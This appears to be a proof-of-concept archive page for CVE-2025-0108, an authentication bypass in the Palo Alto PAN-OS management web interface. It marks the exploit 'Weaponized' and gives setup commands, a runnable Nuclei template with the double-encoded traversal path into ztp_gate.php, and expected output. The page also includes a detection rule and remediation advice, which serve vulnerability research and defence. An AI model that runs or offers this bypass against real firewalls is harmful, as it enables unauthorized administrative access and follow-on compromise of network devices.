PoC Archive PoC Archive
Critical CVE-2025-0108 patched

Palo Alto PAN-OS Management Interface Authentication Bypass (CVE-2025-0108)

by FOLKS-iwd · 2026-05-16

CVSS 9.1/10
Severity
Critical
CVE
CVE-2025-0108
Category
web
Affected product
Palo Alto Networks PAN-OS management web interface
Affected versions
PAN-OS versions impacted by CVE-2025-0108 (see vendor advisory for exact fixed builds)
Disclosed
2026-05-16
Patch status
patched

Metadata

FieldValue
Date Added2026-05-16
Author / ResearcherFOLKS-iwd
CVE / AdvisoryCVE-2025-0108
Categoryweb
SeverityCritical
CVSS Score9.1 (CVSSv3)
StatusWeaponized
Tagsauth-bypass, path-traversal, PAN-OS, Palo Alto, management-interface, unauthenticated
RelatedN/A

Affected Target

FieldValue
Software / SystemPalo Alto Networks PAN-OS management web interface
Versions AffectedPAN-OS versions impacted by CVE-2025-0108 (see vendor advisory for exact fixed builds)
Language / PlatformPAN-OS web management plane (HTTP/HTTPS interface)
Authentication RequiredNo
Network Access RequiredYes

Summary

CVE-2025-0108 is an authentication bypass in the PAN-OS management interface that can allow unauthorized administrative access. The PoC uses a crafted path traversal style request to reach sensitive management functionality without a valid login session. Public reporting indicates active exploitation in early 2025, and defenders frequently track this issue as part of chained PAN-OS compromise activity.


Vulnerability Details

Root Cause

The vulnerable request handling path does not correctly enforce authentication checks when specific crafted management-interface paths are requested. Path traversal style encoding can route traffic into privileged handlers that are expected to be reachable only after successful authentication.

Attack Vector

A remote attacker with network reachability to the PAN-OS management interface sends crafted unauthenticated HTTP requests to vulnerable endpoints. The included PoC template checks for this condition using an encoded traversal path that returns management content when bypass is successful.

Impact

Successful exploitation can provide unauthorized access to management-plane functionality. In real-world attack chains, this can enable follow-on actions such as configuration tampering, credential abuse, and broader device compromise.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host
Target:      PAN-OS firewall exposing management interface (authorized lab only)
Attacker:    Security testing workstation
Tools:       Nuclei, curl

Setup Steps

1
2
3
4
git clone https://github.com/FOLKS-iwd/CVE-2025-0108-PoC
cd CVE-2025-0108-PoC

nuclei -t CVE-2025-0108.yaml -u https://<target-management-host>

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized test scope and identify a PAN-OS management interface target.
  2. Execute the Nuclei template against the target using the included CVE-2025-0108.yaml file.
  3. Review matched responses for indicators that an unauthenticated crafted request reached management content.

Exploit Code

See CVE-2025-0108.yaml in this folder.

1
2
3
4
5
6
id: CVE-2025-0108

requests:
  - method: GET
    path:
      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

Expected Output

[INF] Loaded template CVE-2025-0108
[CVE-2025-0108] [http] [high] https://<target-management-host>/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

Screenshots / Evidence

  • screenshots/ — add authorized captures of template execution and response evidence

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HOME_NET any (
  msg:"Possible PAN-OS CVE-2025-0108 authentication bypass probe";
  content:"/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"; http_uri;
  sid:95250108; rev:1;
)

Remediation

ActionDetail
PatchApply Palo Alto Networks security updates that remediate CVE-2025-0108
WorkaroundRestrict management interface access to trusted admin networks and VPN-only entry points
Config HardeningDisable direct internet exposure of management interfaces and monitor for traversal-pattern probes

References


Notes

Auto-ingested from https://github.com/FOLKS-iwd/CVE-2025-0108-PoC on 2026-05-16.